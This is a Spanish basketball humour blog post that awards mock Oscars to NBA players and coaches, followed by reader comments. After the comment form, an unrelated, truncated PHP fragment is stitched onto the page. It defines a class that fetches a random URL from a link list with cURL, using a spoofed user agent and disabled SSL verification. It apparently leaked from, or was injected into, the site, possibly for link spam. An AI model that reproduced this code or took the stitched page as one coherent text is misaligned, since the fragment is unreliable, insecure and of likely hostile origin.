Reflexiones sobre la bocina #3 Especial Oscars

04 de March de 2011 por MagicJohnson32

oscar nbaTest Voight-Kampff (¿se pilla la referencia a Blade Runner o hace falta que incluya un enlace a esta escena?) para demostrar que eres un auténtico fanático de la NBA:

Cuando escuchas o lees la palabra “Oscar” piensas en…

A) cine

B) salchichas

C) los Milwaukee Bucks de la 73-74

Si tu respuesta es A o B, no sé qué pintas aquí, aunque los cinéfilos tal vez puedan disfrutar con esta tercera edición de las “Reflexiones sobre la bocina” (a los amantes del frakfurt, sinceramente, no sabría qué decirles, salvo que se pasen urgentemente a la butifarra).

Inspirados por la reciente ceremonia de entrega de premios de la Academia de Cine americana, vamos a hacer nuestra propia versión y conceder unos cuantos galardones, tan aleatorios como la selección de tiro de Brandon Jennings.

kingspeechMejor actor protagonista: LeBron James por “The King’s Speech”.

“In this fall, this is very tough, in this fall I’m going to take my talents to South Beach and join the Miami Heat.” Este documento histórico nos sitúa en el célebre 8 de julio de 2010, cuando The King anunció su “decision” de abdicar de su trono en Ohio para aliarse con Wade y Bosh en Florida. James nos ofrece una actuación compleja y poliédrica, con líneas tan contradictorias como estas que pronunció con apenas unos segundos de diferencia:

– “…this morning I woke up, had a great conversation with my mom. Once I had that conversation with her, I think I was set.”

– “The last time I changed my mind was probably in my dreams. And when I woke up this morning I knew it was the right decision.”

Tras la emisión de la película, en Cleveland también se hicieron frecuentes referencias a la mamá de LeBron.

Mejor actor de reparto: Andrew Bogut por “127 hours”.

Inspirada en hechos reales, trata de manera desgarradora las frustraciones del jugador australiano en su intento por anotar 2 tiros libres consecutivos. Tras 127 horas intentándolo en vano, el responsable de mantenimiento del pabellón decidió amputarle el brazo para poder irse a casa de una maldita vez.

pau black swan

Mejor guión: Kobe Bryant por “The Black Swan”.

El maestro del suspense regresa con el relato sobre el tortuoso camino de los Lakers hacia su tercer anillo consecutivo. El guion contiene todos los elementos de las grandes obras de Hollywood: éxito, fracaso, historias de amor que por momentos se tornan odio… y una de las frases del año: “He’s a very White Swan. I need him to be more Black Swan”. Kobe urge así a Pau Gasol para que éste muestre su lado oscuro, agresivo en ataque y duro en defensa, que el de Sant Boi reserva para los grandes escenarios.

El desenlace, la posible conversión de Pau en el temible cisne negro, marcará el destino final del Anillo 2010-2011.

inceptionMejores efectos especiales: Jim O’Brien, Larry Brown y Avery Johnson por “Inception”.

La cinta más espectacular del año relata las trepidantes aventuras de un grupo de entrenadores especializados en el complejo proceso de adentrarse en lo más profundo del subconsciente de sus jugadores para manipular sus pensamientos hasta hacerles creer que no servirían ni para la liga de desarrollo. Larry Brown es el experto en bases, y entre sus víctimas más recientes se encuentran Raymond Felton y DJ Augustin. O’Brien es, por su parte, capaz de convertir a Roy Hibbert en el nuevo Kwame Brown. Por último, Avery Johnson es el encargado de hacer, de un joven proyecto como el de los Nets, un castigo para el buen gusto.

Mejor director: Pat Riley por “The Kids Are All Right”.

La mayor súper producción del año llega de la mano de la privilegiada mente de Pat Riley, director de innumerables obras maestras desde que concibiese en los 80 aquel biutifulregalo para el baloncesto que fue el Showtime. Riley se ha rodeado para la ocasión de tres de las grandes estrellas del firmamento NBA. Seguramente Carlos Arroyo no esté “all right” pero, sinceramente, a quién le importa.

Mejor película de habla no inglesa: Robert Swift por “Biutiful”

Advertencia: las imágenes que se muestran en esta película pueden herir la sensibilidad del espectador.

“Biutiful” es la historia de un hombre consumido por un pasado oscuro (¿hay algo más oscuro que la trayectoria de Robert Swift en los Sonics / Thunder?) en busca de redención. Las imágenes, tan perturbadoras como la del póster de la cinta, que mostramos a la izquierda, producen en el espectador un impulso irrefrenable por rociarse los ojos con lejía.

Por último, os invitamos a reflexionar sobre la bocina: ¿Cuáles serían vuestros nominados? ¿Qué categorías nos hemos dejado en el tintero?

Comenta

12 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Que jartazo de reir!!
    Genial Magic!!!

      Citar

  2. MagicJohnson32 dice:
    #2

    Gracias Hynreck. Por cierto, a ti que te gustan las estadísticas, mírate las de Bogut en tiros libres…

      Citar

  3. Denise dice:
    #3

    A Robert Swift un respeto, que a mi me ganó una liga en el NBA Live 08 con los Sonics (yo jugaba con los Magic) en el último segundo con un tiro de 5 metros. 98-97 en el modo “All-Star” a 6 minutos por cuarto. Desde entonces estoy un poco traumatizado. Quien tenga el NBA Live 08 que lo compruebe, es una máquina.

      Citar

  4. Ru dice:
    #4

    Robert Swift tiene la pinta de típico actor que se multidisfraza en una de sus pelis,tipo Mike Myers en Austin Powers xDDD

      Citar

  5. Tito dice:
    #5

    Juas juas juas!!!!!!
    Es buenísimo, Nacho. Gracias por el estupendo rato que he pasado.

      Citar

  6. HeiNeKeN dice:
    #6

    Muy buen post 😉

      Citar

  7. Hynreck dice:
    #7

    Magic, gracias pero lo de Bogut y los tiros libres me lo se de memoria, no ves que le sufro en la TJ?
    Cuando miro los box scores y miro la casilla de FT, suelo soltar un improperio dedicado la madre del pobre aussie.

    Dios que calamidad. Es que se marca partidos con 2 de 12 y cosas así.

      Citar

  8. MagicJohnson32 dice:
    #8

    Ah claro jaja, yo es que lo sufro en la yahoo.

    Y hablando de estadísticas, 2 rebotes de Brook en Londres. Debí dedicarle una peli al gladiador de los tableros, True Grit por ejemplo xD

      Citar

  9. TheDeerHunter dice:
    #9

    Han llovido ostias bajo tableros… para ver quien agarraba menos rebotes.
    Brook 2, pero Bargnani 3
    Vaya dos Carpantas

      Citar

  10. David dice:
    #10

    muy bueno, que risas mas buenas por la mañana.

      Citar

  11. HisRoyalAirness dice:
    #11

    Yo también le daría el Oscar al mejor actor secundario a Dan Gilbert por “The Cleveland Show” 😀

    Gran post!

      Citar

  12. miquel dice:
    #12

    Perfecto muy bueno

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>